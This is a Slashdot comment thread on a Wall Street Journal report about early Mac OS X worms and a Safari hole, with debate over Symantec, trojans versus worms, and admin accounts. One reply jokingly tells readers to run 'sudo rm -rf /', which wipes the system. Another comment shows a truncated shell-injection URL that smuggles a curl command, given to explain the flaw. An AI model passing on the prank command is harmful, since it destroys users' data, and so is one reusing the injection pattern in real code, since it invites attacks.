Computer 'Worms' Turn on Macs 450
Carl Bialik from WSJ writes "Macs have been laregly immune to the viruses, worms and malware that have plagued PCs, but the Mac's recent popularity uptick has meant that 'bad guys appear to be casing the joint,' the Wall Street Journal reports. Among the signs: two recently discovered worms and the discovery of a vulnerability in Mac OS X that leaves Safari open to a hack. A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows. 'Some security experts believe hackers are becoming more interested in writing nasty code for Macs precisely because of reports of its relative immunity to security woes,' the WSJ reports. 'Apple itself has gone out of its way not to promote the Mac's relative safety, lest it tempt hackers to prove the company wrong. Apple declined to discuss the topic of security in depth for this article.'"
Symantec? (Score:5, Insightful)
Now there's a neutral party with no agenda when it comes to security!
Honestly, the worst Mac malware I've seen so far had a Symantec sticker on the box.
Re:Symantec? (Score:5, Insightful)
Re:Symantec? (Score:4, Insightful)
So yea symantec sales would be slow.
Re:Symantec? (Score:3, Insightful)
Re:Symantec? (Score:4, Insightful)
Re:Symantec? (Score:2)
But here I am talking one.
The timing seems a bit suspicious.
WSJ: "What the rich want you to think." (Score:5, Insightful)
It's completely unacceptable that Slashdot editors would post this garbage. From the referenced article:
"In the past two weeks, information-security companies like Symantec Inc., Sophos PLC and McAfee Inc. have identified several security issues related to the latest version of Apple's Mac operating system, called OS X. Among the concerns: two "worms," programs written by unknown hackers that were designed to spread themselves to other Macs through Apple's iChat instant-messaging software and Bluetooth wireless-communications capability."
Translation: Some public relations drone, with no technical knowledge, paid the Wall Street Journal to post the article. The Wall Street Journal is a "What the rich want you to think" publication, and, in my experience, usually unreliable for anything useful. Note that the article jumps from subject to subject rapidly, apparently to hide the fact that there are no actual incidents of Mac infections to report.
Another translation: Symantec, a maker of very buggy security software of poor design, and other "security" companies want Mac users to buy their products.
Some people, in my opinion, spend their entire working lives being dishonest, trying to trick other people. In my experience some of them work for WSJ.
-
Cheney's company is rapidly [nytimes.com] building prisons [halliburton.com] for the U.S. government.
Re:Symantec? (Score:5, Insightful)
I use iChat every day, and have other Mac users on my "Buddies" list, yet I've still yet to get this particular worm delivered to me, and it's been well over a week since I heard about it being "in the wild." There was even a story about it over on Drudge, so somebody must have been hit by it, right? Yet, I still have yet to hear a first-person account of somebody getting this particular worm sent to them.
Part of the reason for this might be that the Mac gives all kinds of warnings about the nature of incoming files, and even requires that you type in your admin password before running anything that hits any important part of the OS. (Hint: just installing an application or performing trivial tasks does not require a password. Whenever you get a password prompt on a Mac, you know that the app in question is trying to do something which requires root-level access.)
Installing antivirus software on a Mac is worse than useless. Should a virus ever come along which can get past both MacOS security and simple user awareness, currently-existing anitvirus software won't be ready for it anyway.
Plus, I know enough from running antivirus software on my Windows PC at work (which I would never DARE go without) that anitvirus software means a performance hit and less stability of the operating system.
I think I'll just stick with common sense and Apple's frequent OS update patches.
Re:Symantec? (Score:2)
Re:Symantec? (Score:2)
I still get Administrator password prompts when installing OS upgrades and the like, but installing the newest version of EyeTV went like this:
Step 1: Download the image.
Step 2: Drag the application from the image into my Applications folder.
Step 3: There's no step three. *laughs* There's no step three!
Re:Symantec? (Score:2)
Re:Symantec? (Score:5, Informative)
Nearly ever OS X user on a single-person machine runs as admin, and that's what Apple sets up by default. But it's not a bad idea to reocnsider.
Re:Symantec? (Score:3, Informative)
Actually, the reports [ambrosiasw.com] were clear that it doesn't require a password. The reason is that it only modifies iChat.app, not any system files. An admin user has read/write access to /Applications, no authentication necessary. Try it yourself (modifying /Applications, that is, not running the worm).
You're absolutely right that admin != root; but nor is it quite as blind, deaf and dumb as an unprivileged user.
Re:Symantec? (Score:3, Informative)
Re:Symantec? (Score:2)
Odd. I'm mostly a *nix guy, but on the machines where I use Windows, both at home at at work, I don't run virus scanners at all (for the reasons you gave) unless forced on me (like on some work machines) and I haven't gotten hit with a virus since 1991 [google.com].
Well, yes. But in theory the performance h
Immune? (Score:2, Interesting)
Just because no one has exploited a system doesn't mean it doesn't have exploits. I know about a month ago this came up in an article about how OSX/Linux users could face issues because they felt to secure. Hopefully they will be able to cut this off at the quick but don't think that running an "obscure" OS makes you safe. How many Mac users today run anti-virus software?
Re:Immune? (Score:5, Insightful)
*sigh* We don't. We think running an operating system with proper security makes us safe.
Re:Immune? (Score:2)
Re:Immune? (Score:2, Insightful)
Re:Immune? (Score:4, Insightful)
I haven't seen any compelling evidence that Linux or MacOS X are more secure than Windows is against the twin threats of malicious software and badly trained users. They're all based on similar security ideas, which just don't cut the mustard. A better security model [plan99.net] does exist, but it's not implemented in any desktop operating system today.
Re:Immune? (Score:2)
Running anti-virus software is a stupid thing to do when you can FIX the system instead.
Just because Microsoft is at the "fix one bug, re-create another" stage doesn't mean Apple has to go the same road.
An analogy - would you rather eat fresh, properly prepared food, or moldy infested crap and a megadose of antibiotics? (I would have used the "would you rather have sex with someone who isn't infected with HIV, or someone who is, but you take *precau
Re:Immune? (Score:3, Insightful)
What's the phrase? There is no patch for human stupidity?
Go ahead, be smug about it. But the bottom line is that as Mac becomes more popular you're going to have idiots who are going to let thing thru simply because they don't understand what they're doing. Do you really think that Windows user who keep their systems up to date and use a bit of common sense are the ones you're reading about? Windows is insecure in a l
Re:Immune? (Score:2)
Re:Immune? (Score:2)
Basically it all comes down to being smart when using your computer. First and foremost is never run anything in any sort of admin mode unless absolutely necessary. Most mac users create an admin account and use it for everything they do(and I hate to admit I am one of those), that i
Re:Immune? (Score:3, Insightful)
Hopefully very few. With the current state of affairs, anti-virus software for the Mac is a case of the cure being much worse than the disease. Even these recently discovered worms and the Safari vulnerability are relatively benign and can be protected against with a little common sense. In fact, most users hopefully are already safe from the Safari vulnerability since the "Open Safe Files" option was already the source of another vulnerability a while ba
Re:Immune? (Score:2)
Re:Immune? (Score:2)
I know OSX is safed by default than Windows. Its even safer than some Linux distros. That's not too shabby. I recommend an OS preconfigured with sane defaults like OSX or OpenBSD for computer illiterate users who want to access the internet. One could argue OSX is far more userfriendly than OpenBSD, atm, but some Linux distros are almost within their reach..
If we recommend sane defaults maybe we can get some sleep at night, huh?
What's the point? (Score:2)
Well, until just a few weeks ago, there was nothing to scan for, except Windows virusses! So what would the point have been?
The major vendors have engines ready to scan, but things will have to get a whole lot worse and more regular before I will pay up and slow down my system with one of those bastards....
Re:Immune? (Score:2)
-Rick
Re:Immune? (Score:2)
I dunno. How many Mac/Linux users still open attachments from strangers just because they can and say "HA HA! You couldn't do this on a Windows PC without getting infected by a virus! Now I shall post in the forums about my little adventure of opening unsafe attachments!"
Seriously, most people are going on about this like Linux and Mac users like to browse google looking with the searc
not a worm or a virus! (Score:5, Informative)
Re:not a worm or a virus! (Score:2)
Any such program could say that it just needs you to enter your password so that it can perform its miracles on your system, and let you have a faster compurer without paying for it.
Everyone wants something for free, and there are enough average users that don't know any better.
The social engin
Re:not a worm or a virus! (Score:2)
Re:not a worm or a virus! (Score:2)
Re:not a worm or a virus! (Score:5, Insightful)
The difference between the security hole approach and the social engineering approach, is that the latter starts and ends with stupid users. The worm cannot force its way onto the computers of more savy users like the RPC worms in Windows did. Instead, it will set off a huge number of warning flags with more experienced users, and perhaps prompt them to take action to clean other user's computers or encourage them not to run anything that asks for their password.
The end result is that such viruses could not spread as fast or as far as their Windows counterparts.
Re:not a worm or a virus! (Score:2)
Personally I would call them a 'viral trojan'.
Re:not a worm or a virus! (Score:2)
Except that opening the file on a Mac will not automatically install malware without asking for a password. All but totally stupid Mac users already know that opening a media file should not require for them to type a password. Turning of the Safari auto open capability and setting Mail to only display plain text messages makes opening mail and surfing the web much safer. None of our Mac users know the admin password and that gives anothe
Re:not a worm or a virus! (Score:2)
I think you meant to say 'virus' there, and I agree. With user intervention however, we have what I am calling a 'viral trojan'.
Yes it is... (Score:2)
The difference in a virus and worm is the method o
Re:not a worm or a virus! (Score:3, Insightful)
Pretty nasty IM
Re:not a worm or a virus! (Score:5, Funny)
I don't get it. I tried running the "rm -rf
Maybe I should try it on my Windows machine next? Shouldn't I type "C:\" instead? Or, is this script not that portable?
There's always Linux... (Score:2)
Turn on (Score:2)
Re:Turn on (Score:2)
WakeOnLan has been doing this for years.
(Don't blame Taco for the misleading headline, editors at the WSJ can screw up too)
Learn what a @#$(*&^ worm is! (Score:2)
Worms are very different than viruses. Don't mix them up! It's not that hard!
Re:Learn what a @#$(*&^ worm is! (Score:2)
Worms, trojans, viruses - pretty sure this will fall under the above: For the technical minded and educated these are indeed very different things. The masses will lump the nomenclature of each together as synonyms f
Re:Learn what a @#$(*&^ worm is! (Score:2)
This attitude can be taken too far. There are plenty of worms which have a trojan/virus component that allows them to spread through various barriers (e.g., firewalls) that a normal worm couldn't. In fact, it's generally bad design not to include this sort of flexibility in an attack if there's even a chance that it will be helpful. So what do we call these things?
Now, you are correct that (on the bright side) none of the Mac
Something like this? (Score:2)
http://upload.wikimedia.org/wikipedia/en/thumb/4/4 5/Fish_Slapping_Dance.png/180px-Fish_Slapping_Danc e.png [wikimedia.org]
Re:Learn what a @#$(*&^ worm is! (Score:2)
I disagree with this (Score:5, Insightful)
Why would criminals care if Apple succeeds? (Score:5, Insightful)
Considering that the main incentive for virus writers these days seems to be economic (profitable criminal activity such as spamming, phishing, DDOS blackmail, identity fraud), it seems unlikely to me that these criminals care if Apple succeeds. More likely, the profit motive isn't there, probably a result the combination of greater security on OSX, and smaller installed base.
It's a proliferation problem... (Score:3, Interesting)
All of those require infection of a system, which requires the virus/Trojan/worm to copy itself from one system to another. The increasing number of Macs creates more dead-ends for a proliferating virus.
Imagine two situations. In the first, everyone is using a Wi
Re:I disagree with this (Score:2)
And its not like symantec have a vested interest in making out that apple is insecure so they can sell more dody AV and firewall products, or anything...
Terminology (Score:2)
I guess this will test ... (Score:3, Insightful)
I.e., will these worms affect the whole computer because of a fault in the operating system, or will they affect only a single user on the computer because of a software issue that let the worm in to play in that user's space, or will it affect people only because of user stupidity ('ooh, really, clicking on this will make my pen0r bigger!')?
Note that Microsoft gets critical security issues fairly often with their approach.
The recent Apple issues have been lowest rated security issues.
Certainly I think that not having users run as root by default will help Mac OS X, but that doesn't stop them entering their password when prompted.
You can't secure against user stupidity except by scanning each file that they try to execute for viruses. And that means virus checkers, and the associated slowdowns they bring.
Re:I guess this will test ... (Score:2)
Certainly I think that not having users run as root by default will help Mac OS X, but that doesn't stop them entering their password when prompted. You can't secure against user stupidity except by scanning each file that they try to execute for viruses. And that means virus checkers, and the associated slowdowns they bring.
I disagree. Creating a blacklist of malware is a way to make machines more secure, but it is only one third of the equation. In addition modern OS's should be implementing jails, A
Re:I guess this will test ... (Score:2)
Childishness (Score:2, Funny)
Using google images as a definitive source, I tried the following searches
Microsoft worm
and
apple worm
Surprisingly the Microsoft one was filled with warning messages and exclamation marks and maggots.
Meanwhile the apple one was all cutesy and cartoony and fluffy (some of the worms even appear to be wearing turtle necks)
The world will continue to turn.
Consider the source (Score:2)
Well, yeah... Symantec has kind of a vested interest in gradually eroding that idea, don't they?
Lets be fair, folks (Score:2, Insightful)
A computer is only as secure as its maintainer.
Re:Lets be fair, folks (Score:2)
I bet the Wintrolls will now
It's not that Linux is secure (Score:3, Insightful)
It's not that Linux is secure. It's that Windows is *insecure*.
Microsoft had a long period (perhaps over?) where they introduced *horribly* insecure designs -- making decisions that completely ignored security in the name of any shred of functionality that they might gain. (And those designs still affect us today.) Double-click execution of executables in email, using their full-bl
Re:Lets be fair, folks (Score:5, Insightful)
Now is it right for me to say that my linux computers are more secure just because they are running linux? No, that's stupid.
Why is that stupid? There are real architectural, operational, testing, and implementation differences between Windows and Linux. Obviously one of them is more secure and less likely to be compromised than the other. There is nothing stupid about looking at those differences and at the track record of both OS's and making predictions and making usage decisions based upon that information. "They're all the same," is the argument of a lazy man or someone trying to justify a bad choice by trying to make all choices look equally bad.
The same thing applies with this story - Macs can be exploited because that is the nature of the business. We usually find the holes because some numbnut exploits it.
No one is arguing that Macs can't be exploited. They certainly can be and are. We do not, however, find most exploitable holes by seeing exploits in the wild. The majority of holes are discovered by developers coding the products. The next largest chunk are found by users and legitimate security researchers. Then a few are found when they are exploited in the wild by hackers. How many zero day exploits have their been for Linux or OS X? The answer is very, very few if any. There have been some for Windows, but most of the underlying vulnerabilities were probably discovered by MS, but they just did not get around to fixing them.
Sure there will be exploits and even zero-day exploits for OS X, but they are just not likely to spread widely or be much of a problem for the average user. If they are a large threat they will be well-known and quickly fixed. A major worm for OS X would be news and it would be unusual. For Windows it is business as usual.
But don't assume that just because no one has broken into your house yet that your house is completely secure.
This is a very good analogy. My house is concrete block and was built with only glass block windows on the first floor. Actually the block is two thick on the first floor. Before I bought it, someone had wired a security system and outdoor flood lights. A few months back someone busted into my shed, but ran off without getting anything. The items in my shed are relatively large an not all that valuable.
I'd say that is a good analogy for OS X. It is built with security in mind on well tested, industrial grade framework. They have added onto it and made it more secure in some ways and less secure in others, but it will likely never be as insecure as the neighbor's ranch style place with two plate glass doors and a key under the mat that you see the kids get out every day.
OS X had someone break into the shed (try to distribute a trojan) but nothing has been taken. It is a good sign that maybe Apple and OS X users should be paying attention and maybe doing some more security reviews, but it is in no way comparable to the apartment complex down the street that have been burgled at least once a month for several years and where we always hear about people getting shot.
Faulty reporting (Score:2)
They are not "targeted" due to their small market share. They are also not targeted due to the fact that they keep changing OSs, processors and whatnot such that any Mac (OSX PPC, OSX x86, OS9 PPC, OS9 Moto) is a subset of an already small market share.
Windows is a huge bullseye due to is truly massive installed base. Linux will be the next target.
Re:Faulty reporting (Score:2)
Mac OS X in the malware picture? (Score:2, Funny)
Basic Steps (Score:2)
1) Leave your firewall on as many ports as possible. Only open it on non-major ports when you're actually using them (it's so easy to change if you want to)
2) Block images in email and don't open DLed crap.
3)Don't run as Admin. make a new account, check the admin box, and uncheck yours.
4)If you're super-paranoid, change the privledges to Terminal to take away everyone's access except root.
These steps literally took 3 minutes on Tige
Re:Basic Steps (Score:2)
Getting the Worms (Score:2)
'Worms' (Score:2)
Doesn't the fact that they require user intervention to propogate make them not worms but trojan horses? Every OS is vulnerable to those, from Irix to Windows.
When Apples get worms... (Score:2)
Overreaction (Score:2)
It's not that Mac OS X is "virus-proof" (Score:5, Insightful)
Even if Apple magically pulls some sort of super OS-jujitsu that reverses their market share and Microsoft's, the basic architecture will stay the same underneath - and that means Apple will have their relative advantages intact for the foreseeable future. Windows is, as its heart, an OS that has traded off many security options for ease of access and ease of programming. Apple had the advantage of seeing what was already happening to Windows when they made their decisions about how OS X would be designed, plus the system it was derived from was pretty robust to begin with.
There will be viruses that attack Mac OS X. Some will do a pretty good job of attacking. I'm kind of surprised it's taken this long to get there. But I'm also not expecting it ever to compare to Windows in that regard.
Duh? (Score:2)
This is what I've been saying for a while. Really, it's kind of a self-evident thing. Let's face it, the hacker (and/or cracker) mentality is often to do things to see if/because it's possible. It's the entire point. Just like government targets have historically been more tempting because they're supposed to be more secure, the more 'impossi
Application versus Operating System (Score:2, Informative)
The key thing to eyeball here, with all the FUD that has been stirred up, is there are OS vulnerabilities and application vulnerabilities. Much like the annual brew-haha when we comapre Linux versus Windows, you must make a clear differentiation.
Like Linux, I would never count, say an Apache hole against Mac nor Linux, since it's an application that is added after a base install. However, unlike Mac or Linux, Windows flaws are very much a hybrid. Windows really doesn't function much as Windows without
root (Score:2)
-ch
Wired article re: Mac security (Score:5, Interesting)
From the linked article:
Re:Wired article re: Mac security (Score:2)
Computer 'Worms' Turn on Macs (Score:2)
Worst. Switch Ad. Ever.
Monopoly? (Score:2)
And here I always thought... (Score:2)
I guess it's hard to compete with an "agressive worm".
Is this..... (Score:2)
Seriously, it seems liek every week that I read a slashdot article which proclaims that the days of the virus-free Mac environment are numbered, and that Mac users will soon be the number 1 target of the malware writers. It seems that if you can use the words "Mac" and "virus" ** in the same article then you're bound to get it posted on some tech news-sh^Hite. Then give it two or three days and virtually the same article will pop-up on the BBC's website with even more inflated dir
Man bites dog journalism (Score:4, Informative)
OS X exploits are news only because they are unusual (though it does serve as an early warning, I sincerely hope Apple is busy auditing their code base). The fact that they are not as severe as Windows exploits, requires more user intervention and are often limited in scope are not discussed or probably understood by most people.
Academic? (Score:2)
For the foreseable future Microsoft Windows will remain a huge security risk [msversus.org].
A Dual-boot Vulnerability? (Score:2)
It's the lack of popularity, same for Linux (Score:2)
As most malware attacks are for profit these days, the Windows environment, with its huge level of insecuri
Argh, what crap (Score:4, Insightful)
The guy who wrote this article doesn't know what he's talking about. "Worms" spread without any user interaction -- they can infect millions of machines on the internet in hours. Those are the kind of vulnerabilities that got Microsoft in trouble in 2003. Viruses require user interaction to work. All the "vulnerabilities" described in the article require the user to install a program and it's trivially easy to be destructive once you have the user's trust.
In addition, virtually all the vulnerabilities described by the article are local ones -- meaning a malicious person needs access to the machine. Truly dangerous vulnerabilities offer remote access, which means any random hacker on the Internet can control the machine from afar. AFAIK, none have been discovered in most Linux distributions or OS X. If OS X did ship with remote vulnerabilities, THAT would be huge news.
The only relevant part of the article comes at the very end:
Many viruses and worms, for instance, don't exploit security holes in operating systems. Instead, they use what are called "social engineering" techniques to trick users into doing things that they shouldn't do, like unwittingly installing programs. The Anna Kournikova worm from 2001, for example, infamously tricked Windows users into installing it by masquerading as photos of the leggy Russian tennis star attached to e-mails.
Rather than weaknesses in operating systems, such approaches exploit "a bug in peoples' brains, which is much harder to patch," Mr. Cluley says.
That should have been the lead. The rest of the article is idiotic.
Old security hole, shared by Windows & Firefox (Score:3, Interesting)
The only worms I've seen announced for OS X so far have depended on social engineering attacks. Social engineering attacks are possible on any OS, because they work by convincing a user to do something. They're basically the same kind of "security hole" as the one the folks claiming to be an exiled dictator with a bundle of cash...
The central security hole* found is one that was discovered almost two years ago, and Apple has refused to fix. That security hole is the use of the desktop shell interface to run programs to display untrusted content. As I wrote at the time [scarydevil.com] this is fundamentally insecure, and yet the native browsers and third party ones still do it.
This is the same kind of error as having a browser on UNIX run an external viewer for a link with code like this: That would be a security hole you could drive a truck through, because you don't know what the shell is really going to do with whatever the URL contained. Maybe it looks like benign.pdf?";curl http :
Well, Safari doesn't really know what the shell (LaunchServices) or the app it calls is going to do, either. It's not quite as obviously bad as the above code, but it's subject to the same kinds of attacks. As has been shown multiple times already on both OS X and Windows.
What's safe?
Well, there's two options.
1. Safari can maintain its own database of safe applications to pass unsafe files to, and call them directly rather than through LaunchServices.
2. Apple can provide an alternate LaunchServices for unsafe content that ONLY contains applications that are explicitly designed for handling unsafe content, or alternatively add an option to LaunchServices saying that the content is unsafe so it can use an alternate database.
Here's some options that have been tried and don't work:
1. Maintain a list of file types and suffixes that you consider "safe", and only use LaunchServices to open these files (Safari and Firefox and IE do this).
2. Modify LaunchServices to try and figure out when an application is being launched on an "unsafe" document, and ask the user if they really want to do this (Apple's 'fix' for the original hole, which has already failed twice).
3. Maintain a list of locations that are "safe" and "unsafe", and only allow dangerous actions based on the location (Microsoft's Security Zones).
So far Apple's tried two of these, let's hope they don't try the third.
* Exacerbated by two other holes: making "Open Safe Files" the default, and considering archives to be "safe" files.
Macs will never catch up (Score:3, Funny)
Works both ways... (Score:3, Funny)
They will only be able to demonize Mac's for so long, until people realise that they are harder to exploit on a large scale because they come with less insane defaults.
BTW, if you really REALLY want to fuck up your Mac install... install some Symantec products. A serious downgrade.
Re:They could report a worm a day ... (Score:3, Funny)
We already know Microsoft's answer, but how does Apple deal with bugs in Mac OS 8 and Mac OS 9? (And does anyone still use Mac OS 7?)
Re:They could report a worm a day ... (Score:2)
Is it realistic to still assume support for any of those systems? Mac OS 9 was released in Oct 1999
Re:They could report a worm a day ... (Score:2)
Re:They could report a worm a day ... (Score:2)
MacOS 9, I'm guessing they fix it.
MacOS 8, I don't know. My guess is that it's not supported anymore, so it doesn't get fixed.
As for Microsoft, they don't fix bugs in NT 4 and Windows 95 anymore. Windows 98 and ME will have their support dropped in five months [microsoft.com], even though there's still *millions* of installed systems out there.
In any event, security is not based on the number of worms and/or viruses out there for a specific platform.
Re:They could report a worm a day ... (Score:3)
Totally irrelevant to what I had posted. Also, again, they already know that their new code is also going to be just as subject to viruses as their old code was - that's why they're including an anti-virus. Microsoft can't make a reasonably secure operating system. Its not part of their culture, nor part of their technical capabilities.
Re:Hooray Social Engineering! (Score:2)
Go to a command window and type "sudo rm -rf /".
Re:Hooray Social Engineering! (Score:2)
I tried that but Windows responded command not found. I thought Windows supported old style commands like that?
Okay I was kidding I don't own a windows box anymore. The people who would try that on a Mac wouldn't know how to get to a terminal window anyway.
Re:Popularity decides if an OS is secure. (Score:4, Insightful)
The situation just isn't as simple as you believe it to be. Sure, the number of people who use an operating system tends to have a relation to the number of people who develop for that system and also the number who have the skills necessary to create a virus, trojan, or worm. But there's more to it than that. Windows, although it's getting better, and hopefully Vista will be much better, has architectural issues that make it easier to exploit. It also has consumer-targeted development tools which have the sole intention of lowering the bar to new programmers. Combine these two, and you have a societal petrie dish ripe for creating malware authors - not only are there more people using the OS, but there are proportionately more people capable of writing malicious software and a system that is easier to exploit.
If the Mac had 95% market share, there would certainly be more malware, but the situation would simply not be as bad as it is for Windows right now.
Re:Popularity decides if an OS is secure. (Score:5, Interesting)
Far be it for me to shatter your little bubble, but Apache Web Server is more popular than IIS, and has significantly less critical exploits.
God, it feels like Karma whoring just pointing out something so bloody obvious.
Re:Simple math... (Score:2)
Uh right. Care to explain then why there aren't worms spreading via Apache? Or Nokia mobile phones? Or Blackberrys. Or all sorts of other really popular software/devices?
Popularity and exposure play important roles, but not as much as other issues like ingrained behaviour, or unpatched vulnerabilities. Windows PC's may be pretty damn ubiquitous, but don't forget that they're so easy to attack!